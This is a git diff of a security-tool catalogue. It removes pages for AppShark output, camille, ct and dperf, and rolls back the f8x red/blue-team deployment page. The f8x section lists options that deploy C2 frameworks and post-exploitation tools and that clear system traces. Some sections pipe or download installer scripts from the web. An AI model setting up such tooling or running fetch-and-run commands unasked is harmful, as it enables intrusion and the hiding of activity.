-                "pf{obj{<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>:35=>java.lang.StringBuilder}(unknown)->@data}",
-                "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r11",
-                "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolderFix1(java.lang.String,java.lang.String)>->$r31"
-              ]
-            },
-            "hash": "ec57a2a3190677ffe78a0c8aaf58ba5aee4d2247",
-            "possibility": "4"
-          },
-          {
-            "details": {
-              "position": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>",
-              "Sink": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r34",
-              "entryMethod": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void f()>",
-              "Source": "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r3",
-              "url": "/Volumes/dev/zijie/appshark-opensource/out/vuln/2-unZipSlip.html",
-              "target": [
-                "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r3",
-                "pf{obj{<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>:33=>java.lang.StringBuilder}(unknown)->@data}",
-                "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r14",
-                "<net.bytedance.security.app.pathfinder.testdata.ZipSlip: void UnZipFolder(java.lang.String,java.lang.String)>->$r34"
-              ]
-            },
-            "hash": "26c6d6ee704c59949cfef78350a1d9aef04c29ad",
-            "possibility": "4"
-          }
-        ],
-        "wiki": "",
-        "deobfApk": "/Volumes/dev/zijie/appshark-opensource/app.apk"
-      }
-    }
-  },
-  "DeepLinkInfo": {
-  },
-  "HTTP_API": [
-  ],
-  "JsBridgeInfo": [
-  ],
-  "BasicInfo": {
-    "ComponentsInfo": {
-    },
-    "JSNativeInterface": [
-    ]
-  },
-  "UsePermissions": [
-  ],
-  "DefinePermissions": {
-  },
-  "Profile": "/Volumes/dev/zijie/appshark-opensource/out/vuln/3-profiler.json"
-}
-
-```
-
-# License
-
-AppShark is licensed under the [APACHE LICENSE, VERSION 2.0](http://www.apache.org/licenses/LICENSE-2.0)
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-- 2022-11-03 发布文章[《AOSP Bug Hunting with appshark (1): Intent Redirection》](https://paper.seebug.org/2002/)
-
-## 最近更新
-
-#### [v0.1.2] - 2022-09-22
-
-**更新**  
-- 修复在 windows 平台运行的一些问题
-
-#### [v0.1.1] - 2022-09-16
-
-**更新**  
-- 增加 APIMode 模式  
-- 增加 camile.json 规则
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/camille.md b/detail/camille.md
deleted file mode 100644
index f222e86d3..000000000
--- a/detail/camille.md
+++ /dev/null
@@ -1,95 +0,0 @@
-## camille <https://github.com/zhengjim/camille>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![Author](https://img.shields.io/badge/Author-zhengjim-orange)
-![GitHub stars](https://img.shields.io/github/stars/zhengjim/camille.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-![Time](https://img.shields.io/badge/Join-20230410-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-Android App隐私合规检测辅助工具
-
-## 简介
-
-现如今APP隐私合规十分重要，各监管部门不断开展APP专项治理工作及核查通报，不合规的APP通知整改或直接下架。camille可以hook住Android敏感接口，检测是否第三方SDK调用。根据隐私合规的场景，辅助检查是否符合隐私合规标准。
-
-## 隐私合规资料及政策
-
-[隐私资料政策wiki](https://github.com/zhengjim/camille/wiki)
-
-## 安装
-
-环境：
-
-python3、frida 、一台已root手机(我测试机为Redmi 3s，刷机成魔趣Android 8.1，感觉问题挺多的)，并在手机上运行`frida-server`。
-
-测试了Android 8.1(还测试了魔趣Android 10)，其他版本安卓可能会有bug。
-
-更新日志：
-
-```
-2023-03-14：新增敏感接口
-
-2022-12-12：修复android 13有兼容性问题
-
-2022-11-25：修复截图bug、优化hook方法支持传参数过滤
-
-2022-11-21：新增可指定frida-server用于对抗frida检测，参数-H、修复模拟器没有sdcard目录报错问题
-
-2022-11-16：感谢@ysrfeng 添加wiki，添加隐私合规相关资料和政策文档。
-
-2022-11-15：合并@RebornQ PR，新增多设备可指定设备功能
-
-2022-11-11：修复Android7报错、Frida12报错、优化异常处理便于排查
-
-2022-11-10: 合并@RebornQ PR、修复部分问题、优化初始化异常提示
-
-2022-11-03: 添加同意隐私合规状态(需人工确认)、第三方SDK识别、可hook构造函数，`methodName`传`'$init'`。方便大家交流，创建交流群。 新增文件接口，感谢@LiuXinzhi94提供。 新增敏感接口，感谢群里师傅@WYY提供
-
-2022-10-26：新增支持加载外部脚本文件，填相对路径或绝对路径均可（用于 pyinstaller 打包二进制执行文件后使用）感谢@RebornQ pr
-
-2022-09-07：添加讨论群，新增敏感接口，感谢群里师傅@410提供。
-
-2022-07-08: 默认不开启绕过TracerPid,添加attach hook，避免有些加固包不能hook问题。
-
-2022-06-22：修复程序异常退出、冗余度高、hook接口不全有遗落、新增多个Android版本接口；封装hook方法，新增用户自定义hook方法。
-
-2022-01-14：删除hook短信接口。新增：可指定模块hook或不hook哪些模块。默认不传，全扫描。
-```
-
-下载：
-
-```
-git clone https://github.com/zhengjim/camille.git
-cd camille
-pip install -r requirements.txt
-python camille.py -h
-```
-
-![img.png](https://github.com/zhengjim/camille/raw/master/images/img.png)
-
-## 用法
-
-[使用说明文档](https://github.com/zhengjim/camille/blob/master/docs/use.md)
-
-## 后记
-
-本来想使用uiautomator2或appium来模拟点击制定场景，~~但后续调研发现纯自动化的检测是不全的，最多也就检测20-30%，还是得结合人工来检测。索性就删除了模拟点击这块。~~(其实就是懒，不定期更新)
-
-## 场景
-
-[百度史宾格的检测场景](https://github.com/zhengjim/camille/blob/master/docs/detection_scene.md)
-
-## 参考链接
-
-- https://github.com/Dawnnnnnn/APPPrivacyDetect
-- https://github.com/r0ysue/r0capture/
-- https://github.com/ChenJunsen/Hegui3.0
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/ct.md b/detail/ct.md
deleted file mode 100644
index 19cf143f9..000000000
--- a/detail/ct.md
+++ /dev/null
@@ -1,154 +0,0 @@
-## ct <https://github.com/knownsec/ct>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Rust-blue)
-![Author](https://img.shields.io/badge/Author-rungobier@Knownsec404-orange)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/ct.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.0.9-red)
-![Time](https://img.shields.io/badge/Join-20211213-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-ct 是一款使用 rust 语言进行开发，并且基于 ZoomEye 域名查询以及利用域名字典进行子域名爆破的工具，同时在最终爆破完成后， 自动生成 Windows/*nix 下的可执行脚本。 脚本内容为自动将相应的的.gv 文件转化成为相应的
-.png 文件，graphviz 下载安装请参见 [graphviz](https://graphviz.org/download/)
-支持在Windows/Linux/Mac上使用。
-
-## 编译环境构建
-
-*nix 编译环境执行如下指令即可安装：
-
-```
-curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
-```
-Windows 编译环境安装请下载[rustup-init.exe](https://static.rust-lang.org/rustup/dist/i686-pc-windows-gnu/rustup-init.exe)并执行。
-
-
-## 使用
-
-从[releases](https://github.com/knownsec/ct/releases "releases")下载二进制文件。
-
-```
-ct 1.0.9
-Autor: rungobier@knownsec 404 team <rungobier@gmail.com>
-Collect information tools about the target domain.
-
-USAGE:
-    ct_win64.exe [FLAGS] [OPTIONS] [domain]
-
-FLAGS:
-    -E                Extended analysis domain
-    -T                Network upload speed test.
-    -Z                Do not use zoomeye data
-    -C, --cidr        Convert the IP related to the target domain name to cidr for extended search. Default is false.
-    -h, --help        Prints help information
-    -i, --info        Get ZoomEye account base info
-    -q, --query-ip    Use zoomeye to query ip information
-    -V, --version     Prints version information
-
-OPTIONS:
-        --init <apikey>                Initialize the ZoomEye api key
-    -s, --dns-dict <dns-file>          DNS Server list in a textual file.
-                                       file example...
-                                       8.8.8.8
-                                       1.1.1.1
-                                       ...
-    -d, --domain-dict <domain-file>    Domain dict list in a file.
-                                       file example....
-                                       www
-                                       mail
-                                       dev
-                                       ...
-    -F <filter-domains>                Extended filter domain list.
-                                       Example of extended filtering domain name list:
-                                       knownsec.com,jiasule.com,365cyd.com...
-        --query-num <query-num>        Maximum number of zoomeye query. Default query number 100
-    -t, --threads <thread-num>         Maximum number of threads. Default number $CPU_NUM
-    -w, --work-dir <work-dir>          Directory to save the results of tasks. Default
-                                       [/tmp|$DESKTOP]/YYYYmmddHHMM_$DOMAIN
-
-ARGS:
-    <domain>    Target domain name
-
-```
-
-### 常用命令
-
-```
-ZoomEye apikey 初始化
-ct --init 62EC1239-xxxx-xxxxx-xxxx-e45291301ee
-
-开启扩展搜索
-ct -E 
-
-过滤域名，域名之间以,分隔
-ct -F
-
-查看ZoomEye账号信息
-ct -i
-
-上行网络测速 (使用了speedtest库)
-ct -T
-
-利用zoomeye的域名查询进行的懒人模式 默认每账号每天2万条查询结果
-ct baidu.com
-
-使用域名字典爆破
-ct -d domain_dict.txt baidu.com
-
-使用指定dns域名解析服务器及字典进行爆破(不使用ZoomEye数据加-Z，默认不加为合并) 字典路径需要带完整路径
-ct -Z -d domain_dict.txt -s dns.txt baidu.com
-```
-
-## 域名以及IP关系图形生成
-
-*nix
-
-```bash
-cd /tmp/202111301212_baidu.com
-chmod +x convert2png.sh
-./convert2png.sh
-ls *.png
-```
-
-Windows
-
-```bat
-cd C:\Users\rungobier\Desktop\202111301212_baidu.com
-convert2png.bat
-dir *.png
-```
-
-最终生成的效果图如下：
-
-![域名维度](https://github.com/knownsec/ct/raw/main/images/domain_graph.gv.svg)
-
-## 编译
-
-```bash
-git clone https://github.com/knownsec/ct
-cd ct
-cargo build --release
-./target/release/ct 
-```
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-#### [v1.0.9] - 2022-07-18
-
-**更新**  
-- 加入域名自动扩展搜索参数 -E- 加入无效域名过滤参数 -F， 同时自带过滤清单- 修改部分bug
-
-**Example**  
-- `ct -E -F 365cyd.cn,jiashule.com,365cyd.com,knownsec.com baidu.com`
-
-#### [v1.0.5] - 2022-01-13
-
-**新增**  
-- 加入查询IP开关参数
-
-**优化**  
-- 调整网速测试的代码
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/dperf.md b/detail/dperf.md
deleted file mode 100644
index 56f77a023..000000000
--- a/detail/dperf.md
+++ /dev/null
@@ -1,152 +0,0 @@
-## dperf <https://github.com/baidu/dperf>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-C-blue)
-![Author](https://img.shields.io/badge/Author-Benjamin-orange)
-![GitHub stars](https://img.shields.io/github/stars/baidu/dperf.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.5.0-red)
-![Time](https://img.shields.io/badge/Join-20230410-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-dperf 是一个100Gbps的网络性能与压力测试软件。
-
-## 优点
-- 性能强大：
-  - 基于 DPDK，使用一台普通 x86 服务器就可以产生巨大的流量：千万级的 HTTP 每秒新建连接数，数百Gbps的带宽，几十亿的并发连接数
-- 统计信息详细：
-  - 能够输出详细的统计信息，并且识别每一个丢包
-- 使用场景丰富：
-  - 可用于对四层负载均衡等四层网关进行性能压力测试、长稳测试
-  - 可用于对云上虚拟机的网络性能进行测试
-  - 可用于对网卡性能、CPU的网络报文处理能力进行测试
-  - 压测场景下，可作为高性能的HTTP Server或HTTP Client单独使用
-
-## 性能
-### HTTP每秒新建连接数
-|Client Cores|Server Cores|HTTP CPS|
-|------------|------------|--------|
-|1|1|2,101,044|
-|2|2|4,000,423|
-|4|4|7,010,743|
-|6|6|10,027,172|
-
-### HTTP吞吐
-|Client Cores|Server Cores|RX(Gbps)|TX(Gbps)|Client CPU Usage(%)|Server CPU Usage(%)|
-|------------|------------|--------|--------|-------------------|-------------------|
-|1|1|18|18|60|59|
-|2|2|35|35|60|59|
-|4|4|46|46|43|43|
-
-### HTTP并发连接数
-|Client Cores|Server Cores|Current Connections|Client CPU Usage(%)|Server CPU Usage(%)|
-|------------|------------|-------------------|-------------------|-------------------|
-|1|1|100,000,000|34|39|
-|2|2|200,000,000|36|39|
-|4|4|400,000,000|40|41|
-
-### UDP TX PPS
-|Client Cores|TX MPPS|Client CPU Usage(%)|
-|------------|-------|-------------------|
-|1|15.96|95|
-|2|29.95|95|
-|4|34.92|67|
-|6|35.92|54|
-|8|37.12|22|
-
-注意：本测试基于单张25Gbps Mellanox CX4
-
-### 测试环境配置（客户端、服务器）
-dperf 的以上性能数据，基于下面的配置测试得到：
-
-- 内存: 512GB(大页 100GB)
-- 网卡: Mellanox MT27710 25Gbps * 2
-- 内核: 4.19.90
-
-## 统计数据
-dperf 每秒输出多种统计数据：
-- TPS, CPS,  各种维度的PPS
-- TCP/Socket/HTTP级别的错误数
-- 丢包数
-- 按照TCP Flag分类的报文重传数
-
-```
-seconds 22                 cpuUsage 52
-pktRx   3,001,058          pktTx    3,001,025          bitsRx   2,272,799,040      bitsTx  1,920,657,600      dropTx  0
-arpRx   0                  arpTx    0                  icmpRx   0                  icmpTx  0                  otherRx 0          badRx 0
-synRx   1,000,345          synTx    1,000,330          finRx    1,000,350          finTx   1,000,350          rstRx   0          rstTx 0
-synRt   0                  finRt    0                  ackRt    0                  pushRt  0                  tcpDrop 0
-skOpen  1,000,330          skClose  1,000,363          skCon    230                skErr   0
-httpGet 1,000,345          http2XX  1,000,350          httpErr  0
-ierrors 0                  oerrors  0                  imissed  0
-```
-
-## 开始使用
-### 设置大页
-    #参考如下参数编辑 '/boot/grub2/grub.cfg'，然后重启OS
-    linux16 /vmlinuz-... nopku transparent_hugepage=never default_hugepagesz=1G hugepagesz=1G hugepages=8
-
-### 编译DPDK
-    #编辑'config/common_base'打开PMD开关
-    #Mellanox CX4/CX5 requires 'CONFIG_RTE_LIBRTE_MLX5_PMD=y'
-    #HNS3 requires 'CONFIG_RTE_LIBRTE_HNS3_PMD=y'
-    #VMXNET3 requires 'CONFIG_RTE_LIBRTE_VMXNET3_PMD=y'
-    
-    TARGET=x86_64-native-linuxapp-gcc #or arm64-armv8a-linuxapp-gcc
-    cd /root/dpdk/dpdk-stable-19.11.10
-    make install T=$TARGET -j16
-
-### 编译dperf
-    cd dperf
-    make -j8 RTE_SDK=/root/dpdk/dpdk-stable-19.11.10 RTE_TARGET=$TARGET
-
-### 绑定网卡 
-    #Mellanox网卡跳过此步
-    #假设PCI号是0000:1b:00.0
-    
-    modprobe uio
-    modprobe uio_pci_generic
-    /root/dpdk/dpdk-stable-19.11.10/usertools/dpdk-devbind.py -b uio_pci_generic 0000:1b:00.0
-
-### 启动dperf server
-    #dperf server监听6.6.241.27:80, 网关是6.6.241.1
-    ./build/dperf -c test/http/server-cps.conf
-
-### 从客户端发送请求
-    #客户端IP必须要在配置文件的'client'范围内
-    ping 6.6.241.27
-    curl http://6.6.241.27/
-
-## 运行测试
-下面的例子运行一个HTTP CPS压力测试。    
-    #在server端运行dperf
-    ./build/dperf -c test/http/server-cps.conf
-    
-    #以另一台机器作为client端，运行dperf
-    ./build/dperf -c test/http/client-cps.conf
-
-## 文档
- - [配置手册](https://github.com/baidu/dperf/blob/main/docs/configuration-CN.md)
- - [设计原理](https://github.com/baidu/dperf/blob/main/docs/design-CN.md)
- - [编译指导](https://github.com/baidu/dperf/blob/main/docs/build.md) 
- - [统计说明](https://github.com/baidu/dperf/blob/main/docs/statistics-CN.md)
-
-## 限制
- - dperf 要求HTTP消息在一个数据包中，所以不适合7层负载均衡的测试。
- - dperf 要求独占使用网络接口。
- - dperf 没有路由功能。建议配合三层交换机搭建测试环境。
-
-## 相关文章
-- [dperf FAQ(zh)](https://zhuanlan.zhihu.com/p/561093951)
-- [How to set up dperf](https://metonymical.hatenablog.com/entry/2022/02/11/234927)
-- [Using dperf to test network bandwidth](https://github.com/baidu/dperf/blob/main/test/performance/bandwidth/README.md)
-- [DPVS v1.9.2 Performance Tests by dperf](https://github.com/iqiyi/dpvs/blob/master/test/release/v1.9.2/performance.md)
-- [Using dperf to test 100Gbps bandwidth(zh)](https://zhuanlan.zhihu.com/p/601137162)
-- [How to install dperf on ubuntu](https://github.com/digger-yu/blog/blob/main/how%20to%20install%20dperf%20on%20ubuntu.md)
-- [Using dperf to test the performance of DPVS(zh)](https://blog.csdn.net/yuubeka/article/details/128945241)
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/f8x.md b/detail/f8x.md
index a4d44270d..5a309d6dc 100644
--- a/detail/f8x.md
+++ b/detail/f8x.md
@@ -3,25 +3,25 @@
 ![Language](https://img.shields.io/badge/Language-Bash-blue)
 ![Author](https://img.shields.io/badge/Author-ffffffff0x-orange)
 ![GitHub stars](https://img.shields.io/github/stars/ffffffff0x/f8x.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.6.2-red)
+![Version](https://img.shields.io/badge/Version-V1.5.7-red)
 ![Time](https://img.shields.io/badge/Join-20210223-green)
 <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
 
 
 一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等。
 
-
-大多数场景下，在不同的云购买一些 vps 服务器用于部署红 / 蓝队设施，不能做到开箱即用，使用 f8x 可以快速部署所需要的各类服务。同时兼顾到本地 VM 虚拟机的需求，可以选择走 socket 代理进行安装部署，Proxychains-ng 也会自动安装，只需做好 Proxychains-ng 配置即可。
+大多数场景下，在不同的云购买一些 vps 服务器用于部署红 / 蓝队设施，不能做到开箱即用，使用此工具可以快速部署所需要的各类服务。同时兼顾到本地 VM 虚拟机的需求，可以选择走 socket 代理进行安装部署，Proxychains-ng 也会自动安装，只需做好 Proxychains-ng 配置即可。
 
 ## 开始
 
 **下载**
-- 通过 CF Workers 下载 [推荐]
-  - wget : `wget -O f8x https://f8x.io/`
-  - curl : `curl -o f8x https://f8x.io/`
 
 - 访问 [releases](https://github.com/ffffffff0x/f8x/releases) 下载
 
+- 在网络不佳的情况下通过 CF Workers 加速下载
+  - wget : `wget -O f8x https://f8x.io/`
+  - curl : `curl -o f8x https://f8x.io/`
+
 **使用**
 ```bash
 bash f8x -h
@@ -29,9 +29,9 @@ bash f8x -h
 
 如果你希望方便点使用可以直接加到环境变量中
 - wget : `wget -O f8x https://f8x.io/ && mv --force f8x /usr/local/bin/f8x && chmod +x /usr/local/bin/f8x`
-  - `f8x -h`
+  - `f8x -help`
 - curl : `curl -o f8x https://f8x.io/ && mv --force f8x /usr/local/bin/f8x && chmod +x /usr/local/bin/f8x`
-  - `f8x -h`
+  - `f8x -help`
 
 **系统依赖**
 
@@ -48,101 +48,89 @@ f8x 基本上不需要任何依赖,或者说它就是为了帮助你安装各种
 
 **f8x-dev**
 
-该脚本用于部署中间件和数据库环境,支持 (apache、nginx、tomcat、Database、php) 分类
+部分开发环境安装独立到该脚本,如 tomcat、redis 不同版本的部署
 
 - wget : `wget -O f8x-dev https://f8x.io/dev`
   - `bash f8x-dev -help`
 - curl : `curl -o f8x-dev https://f8x.io/dev`
   - `bash f8x-dev -help`
 
----
-
 ## 支持选项
 
-目前 f8x 支持以下部署选项 (Linux arm64 下大部分都支持)
+目前 f8x 支持以下部署选项
 
 **1. 批量化安装**
-- 使用 -b 选项安装基本环境 (gcc、make、git、vim、telnet、jq、unzip 等基本工具)
-- 使用 -p 选项安装代理环境 (警告:国外云服务器上不要用,会降速)
-- 使用 -d 选项安装开发环境 (python3、pip3、Go、Docker、Docker-Compose、SDKMAN)
-- 使用 -k 选项安装渗透环境 (hashcat、ffuf、OneForAll、ksubdomain、impacket 等渗透工具)
-  - -ka 信息收集、扫描、爆破、抓取
-  - -kb 漏洞利用
-  - -kc 后渗透、C2
-  - -kd 其他
-  - -ke 功能重叠或长期不维护
-- 使用 -s 选项安装蓝队环境 (Fail2Ban、chkrootkit、rkhunter、河马webshell查杀工具)
-- 使用 -f 选项安装其他工具 (Bash_Insulter、vlmcsd、AdguardTeam、trash-cli 等辅助工具)
-- 使用 -cloud 选项安装云应用 (Terraform、Serverless Framework、wrangler)
-- 使用 -all 选项全自动化部署 (默认不走代理,兼容 CentOS7/8,Debain10/9,Ubuntu20/18,Fedora33)
+- 使用 -b 选项安装基本环境        (gcc、make、git、vim、telnet、jq、unzip 等基本工具)
+- 使用 -p 选项安装代理环境        (警告:国外云服务器上不要用,会降速)
+- 使用 -d 选项安装开发环境        (python3、pip3、Go、Docker、Docker-Compose、SDKMAN)
+- 使用 -k 选项安装渗透环境        (hashcat、ffuf、OneForAll、ksubdomain、impacket 等渗透工具)
+  - -k -a 信息收集、扫描、爆破、抓取
+  - -k -b 漏洞利用
+  - -k -c 后渗透、C2
+  - -k -d 其他
+  - -k -e 功能重叠或长期不维护
+- 使用 -s 选项安装蓝队环境        (Fail2Ban、chkrootkit、rkhunter、河马webshell查杀工具)
+- 使用 -f 选项安装其他工具        (Bash_Insulter、vlmcsd、AdguardTeam、trash-cli 等辅助工具)
+- 使用 -cloud 选项安装云应用      (Terraform、Serverless Framework、wrangler)
+- 使用 -all 选项全自动化部署      (默认不走代理,兼容 CentOS7/8,Debain10/9,Ubuntu20/18,Fedora33)
 
 **2. 开发环境**
-- 使用 -docker 选项安装 docker 环境
+
 - 使用 -lua 选项安装 lua 环境
 - 使用 -nn 选项安装 npm & NodeJs 环境
-- 使用 -go 选项安装 go 环境
-- 使用 -oraclejdk(8/11) 选项安装 oraclejdk 环境
+- 使用 -oraclejdk 选项安装 oraclejdk 环境
 - 使用 -openjdk 选项安装 openjdk 环境
-- 使用 -py3(7/8/9/10) 选项安装 python3 环境
-- 使用 -py2 选项安装 python2 环境
-- 使用 -pip2-f 选项强制安装 pip2 环境 (建议在 -python2 选项失败的情况下运行)
+- 使用 -python3 选项安装 python3 环境
+- 使用 -python2 选项安装 python2 环境
+- 使用 -pip2-f 选项强制安装 pip2 环境          (建议在 -python2 选项失败的情况下运行)
 - 使用 -perl 选项安装 perl 环境
 - 使用 -ruby 选项安装 ruby 环境
 - 使用 -rust 选项安装 rust 环境
-- 使用 -code 选项安装 code-server 环境
-- 使用 -chromium 选项安装 Chromium 环境 (用于配合 -k 选项中的 rad、crawlergo)
-- 使用 -phantomjs 选项安装 PhantomJS
+- 使用 -chromium 选项安装 Chromium 环境        (用于配合 -k 选项中的 rad、crawlergo)
+
+**3. 蓝队服务**
 
-**3. 蓝队工具**
 - 使用 -binwalk 选项安装 binwalk 环境
-- 使用 -binwalk-f 选项强制安装 binwalk 环境 (建议在 -binwalk 选项失败的情况下运行)
+- 使用 -binwalk-f 选项强制安装 binwalk 环境    (建议在 -binwalk 选项失败的情况下运行)
 - 使用 -clamav 选项安装 ClamAV 工具
-- 使用 -lt 选项部署 LogonTracer 环境 (非超高配置机器不要部署,这个应用太吃配置了)
+- 使用 -hfish 选项安装 HFish 蜜罐
+- 使用 -lt 选项部署 LogonTracer 环境           (非超高配置机器不要部署,这个应用太吃配置了)
 - 使用 -suricata 选项部署 Suricata 环境
 - 使用 -vol 选项安装 volatility 取证工具
 - 使用 -vol3 选项安装 volatility3 取证工具
 
-**4. 红队工具**
+**4. 红队服务**
+
 - 使用 -aircrack 选项部署 aircrack-ng 环境
 - 使用 -bypass 选项部署 Bypass 环境
-- 使用 -goby 选项部署 Goby 环境 (需要图形化环境)
-- 使用 -wpscan 选项安装 wpscan 工具
-- 使用 -yakit 选项部署 yakit 环境
+- 使用 -cs 选项部署 CobaltStrike 环境
+- 使用 -frp 选项部署 frp 环境
+- 使用 -goby 选项部署 Goby 环境                (需要图形化环境)
+- 使用 -nps 选项部署 nps 环境
 
-**5. 红队基础设施**
-- 使用 -awvs14 选项部署 AWVS13 环境(1.04 GB)
-- 使用 -cs 选项部署 CobaltStrike4.3 环境
-- 使用 -cs45 选项部署 CobaltStrike4.5 环境
-- 使用 -frp 选项部署 frp 工具
-- 使用 -interactsh 选项部署 interactsh 工具 (https://github.com/projectdiscovery/interactsh)
-- 使用 -merlin 选项部署 merlin 环境 (https://github.com/Ne0nd0g/merlin)
-- 使用 -msf 选项部署 Metasploit 环境
-- 使用 -nps 选项部署 nps 工具
-- 使用 -pupy 选项部署 pupy 环境 (https://github.com/n1nj4sec/pupy)
-- 使用 -rg 选项部署 RedGuard 工具 (https://github.com/wikiZ/RedGuard)
-- 使用 -sliver 选项部署 sliver 环境 (https://github.com/BishopFox/sliver)
-- 使用 -sliver-client 选项安装 sliver-client 工具
-- 使用 -sps 选项部署 SharPyShell 工具 (https://github.com/antonioCoco/SharPyShell)
-- 使用 -viper 选项部署 Viper 环境(2.1 GB)
+**5. 基于 Docker 的环境部署**
 
-**6. 基于 Docker 的环境部署**
 - 使用 -arl 选项部署 ARL 环境(872 MB)
+- 使用 -awvs14 选项部署 AWVS13 环境(1.04 GB)
 - 使用 -mobsf 选项部署 MobSF 环境(1.54 GB)
 - 使用 -nodejsscan 选项部署 nodejsscan 环境(873 MB)
+- 使用 -viper 选项部署 Viper 环境(2.1 GB)
 - 使用 -vulhub 选项部署 vulhub 环境(210 MB)
 - 使用 -vulfocus 选项部署 vulfocus 环境(1.04 GB)
-- 使用 -TerraformGoat 选项部署 TerraformGoat 环境
 
-**7. 杂项服务**
+**6. 杂项服务**
+
 - 使用 -asciinema 选项安装 asciinema 截图工具
 - 使用 -bt 选项部署宝塔服务
-- 使用 -clash 选项安装 clash 工具 (https://github.com/juewuy/ShellClash)
+- 使用 -clash 选项安装 clash 工具
+- 使用 -music 选项部署 UnblockNeteaseMusic 服务
 - 使用 -nginx 选项配置 nginx 服务
-- 使用 -ssh 选项配置 ssh 环境 (RedHat 系默认可用,无需重复安装)
+- 使用 -ssh 选项配置 ssh 环境                  (RedHat 系默认可用,无需重复安装)
 - 使用 -ssr 选项部署 ssr 工具
 - 使用 -zsh 选项部署 zsh 工具
 
-**8. 其他**
+**7. 其他**
+
 - 使用 -clear 选项清理系统使用痕迹
 - 使用 -info 选项查看系统各项信息
 - 使用 -optimize 选项改善设备选项,优化性能
@@ -150,96 +138,28 @@ f8x 基本上不需要任何依赖,或者说它就是为了帮助你安装各种
 - 使用 -rmlock 选项运行除锁模块
 - 使用 -swap 选项配置 swap 分区
 - 使用 -update 选项更新 f8x 工具
-- 使用 -upgrade 选项更新渗透工具
-
----
+- 使用 -mock 选项单独调用某个模块
 
 ## 实际效果
 
 **-h 查看帮助**
 
-<h3 align="center">
-  <img src="https://github.com/ffffffff0x/f8x/raw/main/assets/img/1.png"></a>
-</h3>
-
-**-all 全自动化部署**
-
-以 vultr vps 为例,结果分别如下
-
-| <br><b><p align="center">CentOS 7(完全兼容)</p> | <br><b><p align="center">Debian 10(完全兼容)</p> |
-| - | - |
-| <p align="center"><a href="https://asciinema.org/a/WTGNRBd9WYLHUOgZcce9sjkeY"><img src="https://asciinema.org/a/WTGNRBd9WYLHUOgZcce9sjkeY.svg" /></p></a> | <p align="center"><a href="https://asciinema.org/a/Mq0N07O9K2jWsDuUoukHTEVOt"><img src="https://asciinema.org/a/Mq0N07O9K2jWsDuUoukHTEVOt.svg" /></p></a> |
-| <br><b><p align="center">Fedora 33</p> | <br><b><p align="center">Ubuntu 20.10</p> |
-| <p align="center"><a href="https://asciinema.org/a/NccoFLvW5Xcl0PW0HnTu32vHf"><img src="https://asciinema.org/a/NccoFLvW5Xcl0PW0HnTu32vHf.svg" /></p></a> | <p align="center"><a href="https://asciinema.org/a/Us90ody5ffAOIrr9p93dmO8Ct"><img src="https://asciinema.org/a/Us90ody5ffAOIrr9p93dmO8Ct.svg" /></p></a> |
-
+[](https://github.com/ffffffff0x/f8x/blob/main/assets/img/1.png)
 
 <!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
 ## 项目相关
 
-- 2021-11-30 发布视频[《f8x：红/蓝队环境自动化部署工具》](https://mp.weixin.qq.com/s/9MMujhu4PwmRvg0k7hPPUg)
 
 ## 最近更新
 
-#### [v1.6.2] - 2022-09-04
-
-**兼容性**  
-- 支持 CentOS 9 Stream  
-- 支持 Fedora 36  
-
-**功能添加**  
-- -k 选项添加 iprange/dnsx/MoreFind  
-- 添加 -wpscan/-cs45-interactsh/等 选项  
-
-**功能修改与优化**  
-- 优化对docker环境的判断  
-- 添加了对ruby的检测  
-- 优化了对keytool工具的判断
-
-#### [v1.6.1] - 2022-06-06
-
-**兼容性**  
-- 支持 ubuntu 22.04  
-
-**功能添加**  
